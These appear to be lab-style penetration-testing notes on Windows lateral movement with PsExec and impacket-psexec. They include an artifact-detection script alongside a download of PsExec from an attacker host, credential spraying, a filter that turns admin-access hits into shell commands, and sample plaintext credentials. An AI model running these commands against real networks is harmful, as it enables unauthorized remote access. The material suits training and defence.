PsExec Tool

Requirements to run this successfully are as follows:

  1. The user must be a member of the local Administrators group on the target (a domain account works if it is in that group).

  2. The ADMIN$ share (which maps to %SystemRoot%, normally C:\Windows) must exist and be accessible to that user.

  3. File and Printer Sharing must be enabled, i.e. SMB on TCP 445 must be reachable through the firewall.

Working:

  1. Copies PSEXESVC.exe into the C:\Windows directory on the target through the ADMIN$ share

  2. Creates and starts a service (PSEXESVC by default) on the remote host via the Service Control Manager

  3. Runs the requested program/command as a child process of PSEXESVC.exe, relaying stdin/stdout/stderr over named pipes; the service and binary are removed when the session ends
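Each of those three steps leaves a trace on the target. The following is an added example, not from the original page, that lists those artifacts when run locally on a host (elevated). It assumes the default service name PSEXESVC; the real tool's -r option renames the service and the binary, so adjust the pattern if that was used.

```powershell
# Added example (not from the original page): enumerate the artifacts that the
# three steps above leave on a host where PsExec was used. Run elevated on the
# target. Assumes the default service/binary name PSEXESVC (-r changes it).

# Step 2 artifact: service installation is logged as System event 7045.
$svcEvents = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'PSEXESVC' } |
    Select-Object TimeCreated, @{ n = 'Detail'; e = { ($_.Message -split "`n")[0..3] -join ' ' } }

# Step 1 artifact: the dropped binary in %SystemRoot% (what ADMIN$ points at).
# It is normally deleted on exit, but stays behind if the session was killed.
$binary        = Join-Path $env:SystemRoot 'PSEXESVC.exe'
$binaryPresent = Test-Path $binary

# Step 3 artifact (live session only): the control/IO named pipes and the service.
$pipes = [IO.Directory]::GetFiles('\\.\pipe\') | Where-Object { $_ -match 'PSEXESVC' }
$svc   = Get-Service -Name PSEXESVC -ErrorAction SilentlyContinue

[pscustomobject]@{
    ServiceInstallEvents = @($svcEvents).Count
    FirstInstallEvent    = if ($svcEvents) { @($svcEvents)[0].Detail } else { 'none' }
    BinaryOnDisk         = $binaryPresent
    LivePipes            = @($pipes)
    ServiceState         = if ($svc) { $svc.Status } else { 'absent' }
}
```

The 7045 event is the durable indicator: it survives the cleanup PsExec does on exit, whereas the binary, pipes and service entry only exist while a session is running or after an unclean exit.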

Type 1: We have RDP access to a Windows host in the domain (run PsExec from there)

# Assuming that we have RDP access to a domain-joined machine.
# First download the PsTools package from the Sysinternals page on the attack machine:
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

# Extract it, serve the directory over HTTP on port 8000 from the attacker (192.168.45.152 below),
# then fetch PsExec64.exe from inside the RDP session:
iwr -uri http://192.168.45.152:8000/PsExec64.exe -Outfile PsExec64.exe

# Run PsExec against the target
.\PsExec64.exe -i \\<Target_Hostname> -u <Domain>\<Username> -p <Password> <Process>

# Example:
# .\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! powershell

# .\PsExec64.exe: The PsExec executable (64-bit build).
# -i: Runs the process interactively in the console session on the remote desktop; omit it for a plain non-interactive run.
# \\<Target_Hostname>: The remote machine (e.g., \\FILES04).
# -u <Domain>\<Username>: The account to authenticate as (corp\jen); it must be a local admin on the target.
# -p <Password>: The user's password (Nexus123!). Note that it appears in the command line and can be recovered from process listings and command-line logging on the source host.
# <Process>: The program to execute on the target (e.g., powershell).
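Before running the command above it is worth confirming the three requirements from the RDP session, because PsExec's own errors ("Couldn't access", "Access is denied") do not say which one failed. The script below is an added example, not from the original page; it reuses the page's sample target and credentials and assumes PsExec64.exe is already in the current directory.

```powershell
# Added example (not part of the original page): verify the three PsExec
# requirements from the RDP session, then launch PsExec. Reuses the page's
# sample target/credentials; PsExec64.exe is assumed to be in the current dir.
$Target = 'FILES04'
$Domain = 'corp'
$User   = 'jen'
$Pass   = 'Nexus123!'

# Requirement 3: File and Printer Sharing / firewall must allow SMB (TCP 445).
$smb = Test-NetConnection -ComputerName $Target -Port 445 -WarningAction SilentlyContinue
if (-not $smb.TcpTestSucceeded) {
    Write-Warning "TCP 445 on $Target is not reachable; PsExec cannot connect."
    return
}

# Requirements 1 and 2: ADMIN$ must exist and open with this account.
# Only local administrators can open ADMIN$, so a successful map covers both.
$secure = ConvertTo-SecureString $Pass -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential("$Domain\$User", $secure)
try {
    New-PSDrive -Name PsExecCheck -PSProvider FileSystem -Root "\\$Target\ADMIN`$" `
        -Credential $cred -ErrorAction Stop | Out-Null
    Remove-PSDrive -Name PsExecCheck
} catch {
    Write-Warning "Cannot open \\$Target\ADMIN`$ as $Domain\$User : $($_.Exception.Message)"
    return
}

# All checks passed: launch an interactive shell on the target, as on the page.
.\PsExec64.exe -i \\$Target -u "$Domain\$User" -p $Pass powershell
```

One caveat when the ADMIN$ check fails with a local (non-domain) account that is in Administrators: UAC remote restrictions strip the admin token over the network for every local account except the built-in Administrator, so the map fails even though requirement 1 is met, unless LocalAccountTokenFilterPolicy is set to 1 on the target. Domain accounts are not affected.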

Type 2: We don't have RDP access (run impacket-psexec from Kali)

Initial check for access

First spray the credentials over SMB with CrackMapExec/NetExec. In the output, a host tagged '(Pwn3d!)' is one where the credential is a local administrator, so impacket-psexec, which writes to ADMIN$ and installs a service exactly like PsExec does, can be used to get a shell on that machine. A plain '[+]' without the tag means the logon succeeded but the account is not a local admin there.
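When the check is run against a whole subnet the output is long, so it helps to pull out only the '(Pwn3d!)' hosts and turn them into impacket-psexec commands. The script below is an added example, not from the original page; the CrackMapExec-style output it parses is constructed (the WEB04 host and the IP addresses are assumptions), and the page's corp.com\jen credentials are reused.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): filter CrackMapExec/NetExec SMB
# output for hosts where the credential is local admin (lines tagged "(Pwn3d!)")
# and print the matching impacket-psexec command for each one.
#
# Live usage would pipe the real check in, e.g.:
#   crackmapexec smb 192.168.50.0/24 -u jen -p 'Nexus123!' -d corp.com | pwned_hosts

# CME output columns: PROTO  IP  PORT  HOSTNAME  MESSAGE...
# Print the IP of every line carrying the Pwn3d! marker.
pwned_hosts() {
    awk '/\(Pwn3d!\)/ { print $2 }'
}

# Read one IP per line and emit an impacket-psexec command in its
# DOMAIN/USER:PASSWORD@TARGET form (password single-quoted for the shell).
psexec_cmds() {
    domain="$1"; user="$2"; pass="$3"
    while read -r ip; do
        [ -n "$ip" ] || continue
        printf "impacket-psexec %s/%s:'%s'@%s\n" "$domain" "$user" "$pass" "$ip"
    done
}

# Constructed sample output: WEB04 accepts the logon but jen is not admin there,
# FILES04 is the page's target and shows the Pwn3d! tag.
SAMPLE_CME_OUTPUT='SMB         192.168.50.70   445    WEB04            [*] Windows 10.0 Build 20348 x64 (name:WEB04) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         192.168.50.70   445    WEB04            [+] corp.com\jen:Nexus123!
SMB         192.168.50.73   445    FILES04          [*] Windows 10.0 Build 20348 x64 (name:FILES04) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         192.168.50.73   445    FILES04          [+] corp.com\jen:Nexus123! (Pwn3d!)'

printf '%s\n' "$SAMPLE_CME_OUTPUT" | pwned_hosts | psexec_cmds corp.com jen 'Nexus123!'
```

Only 192.168.50.73 (FILES04) survives the filter, and the printed command is the one to run next; the password is single-quoted because '!' and other punctuation in it would otherwise be interpreted by an interactive shell.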
